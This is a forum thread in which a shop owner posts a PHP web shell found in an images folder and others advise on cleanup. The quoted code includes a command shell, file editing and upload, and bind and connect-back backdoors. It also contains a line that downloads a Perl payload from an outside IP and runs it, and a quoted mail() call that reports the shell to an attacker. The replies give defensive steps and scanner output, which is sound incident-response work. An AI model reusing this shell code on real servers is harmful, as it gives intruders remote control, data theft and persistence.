$msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";   <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>  Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>  Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>  Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>  Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />  mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />  from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />  subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>    <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />  <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } shell_exec("cd /tmp ; wget http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*; curl -O http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*; lwp-download http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*; fetch http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*;");?> </div> </body> </html>



Link to comment
Share on other sites

  • Replies 58
  • Created
  • Last Reply

That looks like a "true" positive to me.

 

Normally there are no php file in the images directory.

 

Cheer

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

What are my next steps, what could that hack have done?

The site still seems to be running so maybe only the file wa splaced there and not run.

I have changed the permissions to 000 so that should prevent any damage.

Is there anyway to see how it got there, whether it was a hack through oscommerce code?

Can I just delete it?

Link to comment
Share on other sites

Delete it.

 

Read the first 2 threads in the security forum and instal the 5 must have security add-ons.

 

Work out how the got in by looking at your logs.

 

Check the rest of your site and make sure there is no more rogue code.

 

Have a look at my abut me pages for more things to do.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Delete it.

 

Read the first 2 threads in the security forum and instal the 5 must have security add-ons.

 

Work out how the got in by looking at your logs.

 

Check the rest of your site and make sure there is no more rogue code.

 

Have a look at my abut me pages for more things to do.

 

HTH

 

G

 

The fact it was in the images directory with 777 and created by "You" makes me think I uploaded it somehow from my local computer.

I'm looking for other files on the server with 777 but doesn't seem to be much.

Should I change the site passwords, I can't see from the code snippet above what it is tryiong to do, it just seems like a listing hack.

Link to comment
Share on other sites

Delete it.

 

Read the first 2 threads in the security forum and instal the 5 must have security add-ons.

 

Work out how the got in by looking at your logs.

 

Check the rest of your site and make sure there is no more rogue code.

 

Have a look at my abut me pages for more things to do.

 

HTH

 

G

 

I'd follow this suggestion

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, you are welcome to PM me for help. If you miss any of these steps your site may remain accessible to hackers.

 

 

 

Chris

Link to comment
Share on other sites

Yes, some of the keywords are found in osCommerce, but check any file with those keywords in them anyway. File permissions are irrelevant if the site has already been compromised. I have cleaned several sites where the hacker has changed file permissions AFTER infecting the file.

 

 

 

 

Chris

Link to comment
Share on other sites

Yes, some of the keywords are found in osCommerce, but check any file with those keywords in them anyway. File permissions are irrelevant if the site has already been compromised. I have cleaned several sites where the hacker has changed file permissions AFTER infecting the file.

 

 

 

 

Chris

 

Well, I searched for those terms but I'm not really sure what line of code I should be finding that's suspicious.

Here's an example:

C:\Documents and Settings\J\My Documents\Website backups\mysite.co.uk\cart\includes\header.php

00077: <td class="headerError"><?php echo htmlspecialchars(urldecode($HTTP_GET_VARS['error_message'])); ?></td>

 

Seems fine to me. It's possible I loaded the file up from an add on with images somewhere but it was never executed. I can;t be sure as it's a shared server and I cannot check logs.

Link to comment
Share on other sites

Don't take this the wrong way because it truly isn't meant in a derogatory manner...

:blush:

 

If you can't recognize "rogue code" and you don't have a known "clean" backup to compare every file to your effectiveness in checking/cleansing a site is very limited.

 

Honestly not meant to be rude, crude, or obnoxious - That's just the way it is.

:)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Don't take this the wrong way because it truly isn't meant in a derogatory manner...

:blush:

 

If you can't recognize "rogue code" and you don't have a known "clean" backup to compare every file to your effectiveness in checking/cleansing a site is very limited.

 

Honestly not meant to be rude, crude, or obnoxious - That's just the way it is.

:)

 

True, I did have a backup until I got rid of them about 5mins before I did this week's backup. I don;t usually do this as I keep 4 weeks worth of backups but I decided to do a clean out. Typically, t was the one week that something happened!

How can you recognise rogue code from one line with a base64 or encode line?

They all look fine, it doesn't mean they are.

In the code sniuppet at the top of the page, what does that rogue code actually do?

Link to comment
Share on other sites

Being able to recognize bad code is probably a result of experience than anything else.

 

I haven't looked at the code closely but you must assume the worst - That they were able to and have already done just about anything they wanted. Including:

 


  •  
  • 1. Read any file.
  • 2. Change any file.
  • 3. Add new files any place they chose.
  • 4. Read the database.
  • 5. Alter the databse in any place and fashion they wanted.

 

That would mean they might have added backdoor admin accounts.

 

You need to change your admin password and the database password. Those changes also involve altering the config files.

 

Read Chris's previous posts. He's got it all layed out.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Being able to recognize bad code is probably a result of experience than anything else.

 

I haven't looked at the code closely but you must assume the worst - That they were able to and have already done just about anything they wanted. Including:

 


  •  
  • 1. Read any file.
  • 2. Change any file.
  • 3. Add new files any place they chose.
  • 4. Read the database.
  • 5. Alter the databse in any place and fashion they wanted.

 

That would mean they might have added backdoor admin accounts.

 

You need to change your admin password and the database password. Those changes also involve altering the config files.

 

Read Chris's previous posts. He's got it all layed out.

 

Yes, an account called director was added t the db. I have deleted that, changed the admin password and also changed the config files.

I may be lucky in that my admin account was restricted to geo ip locations through htaccess but I can't be sure.

I am not sure what else to check now short of going through every file that had base64 included?????

 

Err...which post and who is Chris?

Link to comment
Share on other sites

Yes, an account called director was added t the db. I have deleted that, changed the admin password and also changed the config files.

I may be lucky in that my admin account was restricted to geo ip locations through htaccess but I can't be sure.

I am not sure what else to check now short of going through every file that had base64 included?????

 

Err...which post and who is Chris?

 

Sorry, wrong db - they DID NOT get into the database or create admin accounts.

I am not sure what else to check now short of going through every file that had base64 included?????

Link to comment
Share on other sites

Site monitor and VTS (Virus Threat scan ) will scan for known hack strings.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Site monitor and VTS (Virus Threat scan ) will scan for known hack strings.

 

HTH

 

G

 

Well, it reports these but it even reports its own files as positives so I'm not sure of the results.

I checked the cookie_usage files and mail.php and these are all oscommerce defaults.

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 44

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 11

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/configuration.php (Known automated hack <=> eval( ) on line: 125

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/modules.php (Known automated hack <=> eval( ) on line: 218

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/spiffyCal/spiffyCal_v2_1.js (Known automated hack <=> eval( ) on line: 76

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/calendarcode.js (Known automated hack <=> eval( ) on line: 57

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/general.php (Known automated hack <=> eval( ) on line: 405

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/header_tags.php (Known automated hack <=> eval( ) on line: 876

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/espanol/mail.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/german/mail.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/english/mail.php (Known filename threat)

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/modules/newsletters/product_notification.php (Known automated hack <=> eval( ) on line: 61

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/mail.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/cookie_usage.php (Known filename threat)

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/compatibility.php (Known automated hack <=> eval( ) on line: 84

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/espanol/cookie_usage.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/german/cookie_usage.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/english/cookie_usage.php (Known filename threat)

Link to comment
Share on other sites

There is not a shadow of doubt as to what this is .. it is a complex hack script providing the hacker in question with all the information they require to do untold damage to your site and server.

 

Here's a little snippet: -

 

$mail_sent = @mail( "[email protected]", "shell ".$_SERVER['HTTP_HOST'] ,  $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "From:  no-reply@".$_SERVER['HTTP_HOST']);

 

It can walk through the servers files compiling permissions, file ownership, group, safe mode or not. And a lot more.

 

It can attach all of the files as a .gz to the email, etc. etc.

 

An IP for download an image was 195.162.25.142

 

The email also provided the hacker with a nice link to the script which then, in very nicely presented format HTML allows them a whole range of options.

Link to comment
Share on other sites

There is not a shadow of doubt as to what this is .. it is a complex hack script providing the hacker in question with all the information they require to do untold damage to your site and server.

 

Here's a little snippet: -

 

$mail_sent = @mail( "[email protected]", "shell ".$_SERVER['HTTP_HOST'] ,  $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "From:  no-reply@".$_SERVER['HTTP_HOST']);

 

It can walk through the servers files compiling permissions, file ownership, group, safe mode or not. And a lot more.

 

It can attach all of the files as a .gz to the email, etc. etc.

 

An IP for download an image was 195.162.25.142

 

The email also provided the hacker with a nice link to the script which then, in very nicely presented format HTML allows them a whole range of options.

 

I have changed the admin passwords and db.

None of the other files seem to have any changes so all seems ok for the moment.

What else can I do to lock anything down?

Link to comment
Share on other sites

I have changed the admin passwords and db.

None of the other files seem to have any changes so all seems ok for the moment.

What else can I do to lock anything down?

 

How is the images folder open to hacking?

I have put this in now:

<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">

Order Deny,Allow

Deny from all

</FilesMatch>

Link to comment
Share on other sites

If the permissions on the images folder are higher than 755 it can be hacked by anyone at any time.

 

Other than that it would only be writable by hack code elsewhere, or the result of some other vulnerability.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

If the permissions on the images folder are higher than 755 it can be hacked by anyone at any time.

 

Other than that it would only be writable by hack code elsewhere, or the result of some other vulnerability.

 

Just having a folder as 777 doesn't necessarily allow a hacker to get in, they'd have to actually hack through some page on the website first via an SQL injection or other...or get into the shared servers somehow.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...